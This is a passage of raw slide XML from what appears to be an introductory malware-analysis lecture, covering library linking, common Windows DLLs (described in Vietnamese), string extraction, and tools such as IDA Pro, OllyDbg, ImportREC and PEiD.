      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1331640" y="4437000"/>
            <a:ext cx="503640" cy="863640"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724680" y="5548680"/>
            <a:ext cx="171792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OllyDbg/IDA Pro</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="174" name="CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3564000" y="5548680"/>
            <a:ext cx="201168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Plugin OllyDumpEx </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="CustomShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4317840" y="4492440"/>
            <a:ext cx="503640" cy="863640"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="CustomShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7380360" y="4461120"/>
            <a:ext cx="503640" cy="863640"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="395e89"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="CustomShape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7039440" y="5574600"/>
            <a:ext cx="118512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ImportREC</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Linked Libraries and Functions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="179" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="86000"/>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Code libraries can be linked statically, runtime, or dynamically.</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Knowing how the library code is linked is critical to our understanding of malware because information that we can find in PE file header depends on how the library code has been linked.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Static linking: all code of linked library is copied to the executable.</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Dynamic linking:  the host OS searches for the necessary libraries when the program is loaded.</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Runtime linking:  link to the corresponding library when the function needed.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>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Linked Libraries and Functions</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181"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2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Exploring Dynamically Linked Function with Dependency Walker</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="182" name="Google Shape;293;p26" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="35640" y="1124640"/>
            <a:ext cx="9085320" cy="569016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Common DLLs</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="184" name="Table 2"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="251640" y="1124640"/>
          <a:ext cx="8712720" cy="5472360"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="2360520"/>
                <a:gridCol w="6352200"/>
              </a:tblGrid>
              <a:tr h="370440">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr algn="ctr">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>DLL</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Description</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618480">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Kernel32.dll</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Chứa các hàm/chức năng là nhân của HĐH như truy cập và thao tác với bộ nhớ, file và phần cứng</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618480">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Advapi32.dll</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Cung cấp chức năng truy cập đến nhân của HĐH (nâng cao) như quản lý dịch vụ và thanh ghi</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618480">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>User32.dll</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Chứa các giao diện người dùng như button, thanh cuộn, các tương tác với người dùng</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14000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Gdi32.dll</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Chứa các hàm hiển thị và xử lý đồ họa</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1446120">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Ntdll.dll</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>DLL này cho phép giao tiếp với nhân của HĐH.  Thường các file thực thi không import trực tiếp thư viện này mà thực hiện gián tiếp thông qua </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" i="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Kernell32.dll</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
                        <a:latin typeface="Arial"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Nếu một c.trình import DLL này thì c.trình đó muốn sử dụng các chức năng không  cho phép  dùng của Windows như giấu file, hoặc xử lý các tác vụ (process)</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768960">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>WSock32.dll /Ws2_32.dll</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Đây là các thư viện liên quan đến chức năng mạng. Một chương trình sử dụng nó có khả năng sẽ tạo kết nối mạng hoặc thực hiện các tác vụ liên quan.</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617400">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr>
                      <a:noAutofit/>
                    </a:bodyPr>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" i="1" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Wininet.dll</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tabLst>
                          <a:tab algn="l" pos="0"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="en-GB" sz="1600" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Arial"/>
                          <a:ea typeface="Arial"/>
                        </a:rPr>
                        <a:t>Thư viện này chứa các chức năng mạng bậc cao để triển khai các giao thức như FTP, HTTP, NTP.</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Strings</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186"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A program contains strings if it:</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Print a message</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Connects to a URL</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Copies file to a specific location</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Strings (often in ASCII or Unicode) reveals functionalities of a program.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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Strings</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000"/>
          </a:bodyPr>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-120960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-120960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-120960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Unicode</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-120960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-120960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-120960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-120960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="743040" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="519"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Tool</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="445"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Strings.exe</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="445"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>PEiD</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="189" name="Group 3"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1403640" y="1073160"/>
            <a:ext cx="6984720" cy="1563480"/>
            <a:chOff x="1403640" y="1073160"/>
            <a:chExt cx="6984720" cy="1563480"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="190" name="CustomShape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
